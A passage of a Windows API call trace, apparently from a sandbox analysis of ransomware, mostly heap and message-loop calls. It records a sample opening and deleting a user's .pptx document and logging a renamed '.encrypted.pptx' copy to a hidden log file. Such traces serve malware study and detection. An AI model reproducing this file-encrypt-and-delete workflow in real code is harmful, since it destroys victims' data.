lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.708] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.708] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.708] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.708] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0032.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.708] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.709] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.709] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.709] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.709] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.709] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.709] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.709] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0032.709] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5rjt0hce.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0032.709] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.709] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.709] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.709] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.709] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0032.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.709] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.709] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.710] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.710] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.710] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.710] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.710] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.710] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0032.710] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.710] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.710] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.710] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.710] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.710] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.710] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx", lpFilePart=0x0) returned 0x35 [0032.711] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec42880, ftCreationTime.dwHighDateTime=0x1d58018, ftLastAccessTime.dwLowDateTime=0xf13a8410, ftLastAccessTime.dwHighDateTime=0x1d5738b, ftLastWriteTime.dwLowDateTime=0x1361e200, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x127e9, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="5Rjt0hcE.pptx", cAlternateFileName="5RJT0H~1.PPT")) returned 0x7c2100 [0032.711] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5rjt0hce.pptx")) returned 1 [0032.712] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec42880, ftCreationTime.dwHighDateTime=0x1d58018, ftLastAccessTime.dwLowDateTime=0xf13a8410, ftLastAccessTime.dwHighDateTime=0x1d5738b, ftLastWriteTime.dwLowDateTime=0x1361e200, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x127e9, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="5Rjt0hcE.pptx", cAlternateFileName="5RJT0H~1.PPT")) returned 0 [0032.712] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.713] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.713] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.713] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.713] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.713] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.713] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.713] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0032.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.714] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0032.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0032.714] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.714] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.714] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0032.714] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.714] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.714] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0032.714] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0xd45, lpOverlapped=0x0) returned 1 [0032.714] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0032.714] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xd45, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.714] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.encrypted.pptx\r\n", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0032.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x42) returned 0x88e138 [0032.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.encrypted.pptx\r\n", cchWideChar=66, lpMultiByteStr=0x88e138, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.encrypted.pptx\r\n", lpUsedDefaultChar=0x0) returned 66 [0032.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0032.715] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x41, lpOverlapped=0x0) returned 1 [0032.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.715] CloseHandle (hObject=0x140) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.716] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0032.716] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.717] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0032.717] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.717] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0032.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0032.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.718] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0032.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af468 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: 